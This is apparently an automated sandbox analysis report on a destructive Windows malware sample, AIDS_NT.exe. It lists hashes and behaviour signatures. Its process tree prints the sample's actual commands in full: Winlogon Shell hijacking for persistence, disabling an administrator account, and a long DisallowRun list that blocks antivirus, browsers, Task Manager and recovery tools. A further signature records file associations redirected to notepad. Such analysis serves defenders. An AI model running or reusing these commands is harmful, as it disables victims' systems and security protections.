Analysis
-
max time kernel
117s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
21-05-2022 10:35
Static task
static1
Behavioral task
behavioral1
Sample
AIDS_NT.exe
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
AIDS_NT.exe
Resource
win10v2004-20220414-en
General
-
Target
AIDS_NT.exe
-
Size
924KB
-
MD5
14eefb80a0813abbf8710387a5383f08
-
SHA1
d3fa355cc1d184be20b441143fa34e4ae1a4bdb2
-
SHA256
61ee3bd82bed03dd0f3fb9bc9b76b7da972a90d3c12c8e4d5e967440a2f04c00
-
SHA512
a3174a80c47a02b6deed6eb390a999fa486f7a4cda7ab614d93589f614a60ba500aa8f42346e80cc53b7e1a5af0f0e515e4b014d23e5af90fabeae504f43f130
Malware Config
Signatures
-
Modifies WinLogon for persistence 2 TTPs 2 IoCs
Processes:
reg.exereg.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, C:\\Windows\\AIDS_NT_Instructions.txt, C:\\Windows\\aids.bat, C:\\Windows\\42.exe, C:\\Windows\\1.bat" reg.exe -
Modifies system executable filetype association 2 TTPs 4 IoCs
Processes:
reg.exereg.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "notepad.exe" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shell\open\command reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shell\open\command\ = "notepad.exe" reg.exe -
Blocks application from running via registry modification
Adds application to list of disallowed applications.
-
Disables RegEdit via registry modification
-
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Executes dropped EXE 1 IoCs
Processes:
nircmd.exepid process 1688 nircmd.exe -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\RarSFX0\42.exe upx C:\Users\Admin\AppData\Local\Temp\RarSFX0\nircmd.exe upx C:\Users\Admin\AppData\Local\Temp\RarSFX0\nircmd.exe upx -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
AIDS_NT.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation AIDS_NT.exe -
Sets desktop wallpaper using registry 2 TTPs 2 IoCs
Processes:
reg.exereg.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\Desktop\Wallpaper = "C:\\Windows\\1.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\Desktop\Wallpaper = "C:\\Windows\\1.jpg" reg.exe -
Drops file in Windows directory 12 IoCs
Processes:
cmd.exedescription ioc process File opened for modification C:\Windows\42.exe cmd.exe File created C:\Windows\1.jpg cmd.exe File opened for modification C:\Windows\nircmd.exe cmd.exe File created C:\Windows\AIDS_NT_Instructions.txt cmd.exe File opened for modification C:\Windows\AIDS_NT_Instructions.txt cmd.exe File created C:\Windows\nircmd.exe cmd.exe File created C:\Windows\aids.bat cmd.exe File created C:\Windows\1.bat cmd.exe File opened for modification C:\Windows\1.bat cmd.exe File created C:\Windows\42.exe cmd.exe File opened for modification C:\Windows\1.jpg cmd.exe File opened for modification C:\Windows\aids.bat cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies data under HKEY_USERS 15 IoCs
Processes:
LogonUI.exedescription ioc process Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00 LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "13" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" LogonUI.exe -
Modifies registry class 64 IoCs
Processes:
reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\isofile\shell\open reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shell\open\command\ = "notepad.exe" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "notepad.exe" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\aafile\shell\open\command reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ctfile\shell\open\command\ = "notepad.exe" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\logfile\shell reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\hfile\shell\open\command reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\pptfile\shell reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\tmpfile\shell\open\command reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\open\command\ = "notepad.exe" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mp3file\shell\open reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\tiffile\shell\open\command\ = "notepad.exe" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\asmfile\shell\open reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\oggfile reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\avifile\shell\open\command reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\icofile\shell\open reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\jpgfile\shell\open\command\ = "notepad.exe" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\dmgfile\shell\open\command\ = "notepad.exe" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\isofile\shell\open\command reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\tiffile\shell\open\command reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\cabfile reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\jarfile\shell\open\command reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\docfile\shell reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\cfgfile\shell reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\pdffile\shell\open\command reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\isofile reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\asmfile\shell\open\command reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\bmpfile\shell\open\command\ = "notepad.exe" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\cfgfile\shell\open\command reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\ctfile\shell\open\command reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\logfile\shell\open reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mkvfile\shell\open\command\ = "notepad.exe" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\AVIFile\shell\open\command reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\tmpfile\shell reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmfile\shell\open\command\ = "notepad.exe" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\csvfile\shell\open\command reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\oggfile\shell\open reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\zipfile\shell\open\command\ = "notepad.exe" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\tiffile\shell\open reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\docfile\shell\open\command\ = "notepad.exe" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\binfile\shell reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\dllfile\shell\open reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mp3file\shell reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\tmpfile\shell\open reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\asmfile reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\dllfile\shell reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mp4file\shell\open reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\7zfile\shell\open\command reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\binfile\shell\open\command\ = "notepad.exe" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\bmpfile\shell\open reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\AVIFile\shell reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\xlsxfile\shell\open\command reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\aafile\shell\open reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\gzfile reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\cabfile\shell\open\command\ = "notepad.exe" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\cplfile\shell\open\command\ = "notepad.exe" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WSHFile\Shell\Open\Command\ = "notepad.exe" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\pngfile\shell reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\icofile\shell\open\command\ = "notepad.exe" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\cppfile\shell\open reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\zipfile\shell reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\zipfile\shell\open reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\zipfile reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\rarfile reg.exe -
Runs net.exe
-
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
AIDS_NT.exeshutdown.exedescription pid process Token: SeSecurityPrivilege 3944 AIDS_NT.exe Token: SeRestorePrivilege 3944 AIDS_NT.exe Token: SeShutdownPrivilege 2164 shutdown.exe Token: SeRemoteShutdownPrivilege 2164 shutdown.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
LogonUI.exepid process 4616 LogonUI.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
AIDS_NT.execmd.execmd.exenet.exedescription pid process target process PID 3944 wrote to memory of 2364 3944 AIDS_NT.exe cmd.exe PID 3944 wrote to memory of 2364 3944 AIDS_NT.exe cmd.exe PID 3944 wrote to memory of 2364 3944 AIDS_NT.exe cmd.exe PID 2364 wrote to memory of 2276 2364 cmd.exe reg.exe PID 2364 wrote to memory of 2276 2364 cmd.exe reg.exe PID 2364 wrote to memory of 2276 2364 cmd.exe reg.exe PID 2364 wrote to memory of 5104 2364 cmd.exe reg.exe PID 2364 wrote to memory of 5104 2364 cmd.exe reg.exe PID 2364 wrote to memory of 5104 2364 cmd.exe reg.exe PID 2364 wrote to memory of 2252 2364 cmd.exe reg.exe PID 2364 wrote to memory of 2252 2364 cmd.exe reg.exe PID 2364 wrote to memory of 2252 2364 cmd.exe reg.exe PID 3944 wrote to memory of 5052 3944 AIDS_NT.exe cmd.exe PID 3944 wrote to memory of 5052 3944 AIDS_NT.exe cmd.exe PID 3944 wrote to memory of 5052 3944 AIDS_NT.exe cmd.exe PID 5052 wrote to memory of 1688 5052 cmd.exe nircmd.exe PID 5052 wrote to memory of 1688 5052 cmd.exe nircmd.exe PID 5052 wrote to memory of 1688 5052 cmd.exe nircmd.exe PID 5052 wrote to memory of 4764 5052 cmd.exe attrib.exe PID 5052 wrote to memory of 4764 5052 cmd.exe attrib.exe PID 5052 wrote to memory of 4764 5052 cmd.exe attrib.exe PID 5052 wrote to memory of 4556 5052 cmd.exe net.exe PID 5052 wrote to memory of 4556 5052 cmd.exe net.exe PID 5052 wrote to memory of 4556 5052 cmd.exe net.exe PID 4556 wrote to memory of 4408 4556 net.exe net1.exe PID 4556 wrote to memory of 4408 4556 net.exe net1.exe PID 4556 wrote to memory of 4408 4556 net.exe net1.exe PID 5052 wrote to memory of 4612 5052 cmd.exe reg.exe PID 5052 wrote to memory of 4612 5052 cmd.exe reg.exe PID 5052 wrote to memory of 4612 5052 cmd.exe reg.exe PID 5052 wrote to memory of 760 5052 cmd.exe reg.exe PID 5052 wrote to memory of 760 5052 cmd.exe reg.exe PID 5052 wrote to memory of 760 5052 cmd.exe reg.exe PID 5052 wrote to memory of 1416 5052 cmd.exe reg.exe PID 5052 wrote to memory of 1416 5052 cmd.exe reg.exe PID 5052 wrote to memory of 1416 5052 cmd.exe reg.exe PID 5052 wrote to memory of 5028 5052 cmd.exe reg.exe PID 5052 wrote to memory of 5028 5052 cmd.exe reg.exe PID 5052 wrote to memory of 5028 5052 cmd.exe reg.exe PID 5052 wrote to memory of 4432 5052 cmd.exe reg.exe PID 5052 wrote to memory of 4432 5052 cmd.exe reg.exe PID 5052 wrote to memory of 4432 5052 cmd.exe reg.exe PID 5052 wrote to memory of 4020 5052 cmd.exe reg.exe PID 5052 wrote to memory of 4020 5052 cmd.exe reg.exe PID 5052 wrote to memory of 4020 5052 cmd.exe reg.exe PID 5052 wrote to memory of 1912 5052 cmd.exe reg.exe PID 5052 wrote to memory of 1912 5052 cmd.exe reg.exe PID 5052 wrote to memory of 1912 5052 cmd.exe reg.exe PID 5052 wrote to memory of 640 5052 cmd.exe reg.exe PID 5052 wrote to memory of 640 5052 cmd.exe reg.exe PID 5052 wrote to memory of 640 5052 cmd.exe reg.exe PID 5052 wrote to memory of 4616 5052 cmd.exe reg.exe PID 5052 wrote to memory of 4616 5052 cmd.exe reg.exe PID 5052 wrote to memory of 4616 5052 cmd.exe reg.exe PID 5052 wrote to memory of 4656 5052 cmd.exe reg.exe PID 5052 wrote to memory of 4656 5052 cmd.exe reg.exe PID 5052 wrote to memory of 4656 5052 cmd.exe reg.exe PID 5052 wrote to memory of 260 5052 cmd.exe reg.exe PID 5052 wrote to memory of 260 5052 cmd.exe reg.exe PID 5052 wrote to memory of 260 5052 cmd.exe reg.exe PID 5052 wrote to memory of 116 5052 cmd.exe reg.exe PID 5052 wrote to memory of 116 5052 cmd.exe reg.exe PID 5052 wrote to memory of 116 5052 cmd.exe reg.exe PID 5052 wrote to memory of 4536 5052 cmd.exe reg.exe -
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\AIDS_NT.exe"C:\Users\Admin\AppData\Local\Temp\AIDS_NT.exe"1⤵
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\start.bat" "2⤵
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v Shell3⤵
- Modifies WinLogon for persistence
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v Shell /d "explorer.exe, C:\Windows\AIDS_NT_Instructions.txt, C:\Windows\aids.bat, C:\Windows\42.exe, C:\Windows\1.bat"3⤵
- Modifies WinLogon for persistence
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d C:\Windows\1.jpg /f3⤵
- Sets desktop wallpaper using registry
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\PkgMgr.bat" "2⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\nircmd.exenircmd win hide title "C:\Windows\system32\cmd.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\attrib.exeattrib C:\Windows\PkgMgr.bat +h +s +a +r3⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\net.exenet user ╨É╨┤╨╝╨╕╨╜╨╕╤ü╤é╤Ç╨░╤é╨╛╤Ç /active:no3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user ╨É╨┤╨╝╨╕╨╜╨╕╤ü╤é╤Ç╨░╤é╨╛╤Ç /active:no4⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /f /v HideFastUserSwitching /t REG_DWORD /d "1"3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun"3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /f /v "DisallowRun" /t REG_DWORD /d "1"3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "1" /t REG_SZ /d "MSASCui.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "2" /t REG_SZ /d "msmpeng.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "3" /t REG_SZ /d "msdt.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "4" /t REG_SZ /d "ProcessHacker.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "5" /t REG_SZ /d "spideragent.exe " /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "6" /t REG_SZ /d "SbieSvc.exe " /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "7" /t REG_SZ /d "SearchUI.exe " /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "8" /t REG_SZ /d "dwscanner.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "9" /t REG_SZ /d "aswEngSrv.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "10" /t REG_SZ /d "AvastSvc.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "11" /t REG_SZ /d "AvastUI.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "12" /t REG_SZ /d "AvastBrowserCrashHandler.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "13" /t REG_SZ /d "chrome.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "14" /t REG_SZ /d "VirtualBox.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "15" /t REG_SZ /d "CCleaner64.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "16" /t REG_SZ /d "CCleaner32.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "17" /t REG_SZ /d "CCleaner86.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "18" /t REG_SZ /d "CCleaner.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "19" /t REG_SZ /d "firefox.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "20" /t REG_SZ /d "taskmgr.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "21" /t REG_SZ /d "opera.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "22" /t REG_SZ /d "iexplore.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "23" /t REG_SZ /d "perfmon.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "24" /t REG_SZ /d "msconfig.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "25" /t REG_SZ /d "WUDFHost.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "26" /t REG_SZ /d "msconfig.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "27" /t REG_SZ /d "SecurityHealthSystray.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "28" /t REG_SZ /d "rstrui.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "29" /t REG_SZ /d "mcapexe.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "30" /t REG_SZ /d "McCSPServiceHost.exe " /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "31" /t REG_SZ /d "McInstruTrack.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "32" /t REG_SZ /d "McPvTray.exe " /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "33" /t REG_SZ /d "mcshield.exe " /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "34" /t REG_SZ /d "McUICnt.exe " /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "35" /t REG_SZ /d "MfeAVSvc.exe " /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "36" /t REG_SZ /d "mfefire.exe " /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "37" /t REG_SZ /d "mfevtps.exe " /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "38" /t REG_SZ /d "MMSSHOST.exe " /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "39" /t REG_SZ /d "ModuleCoreService.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "40" /t REG_SZ /d "control.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "41" /t REG_SZ /d "avp.exe " /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "42" /t REG_SZ /d "avpui.exe " /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "43" /t REG_SZ /d "kav.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "44" /t REG_SZ /d "vmware.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "45" /t REG_SZ /d "msinfo32.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "46" /t REG_SZ /d "RecoveryDrive.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "47" /t REG_SZ /d "dwscanner.exe" /f3⤵
-
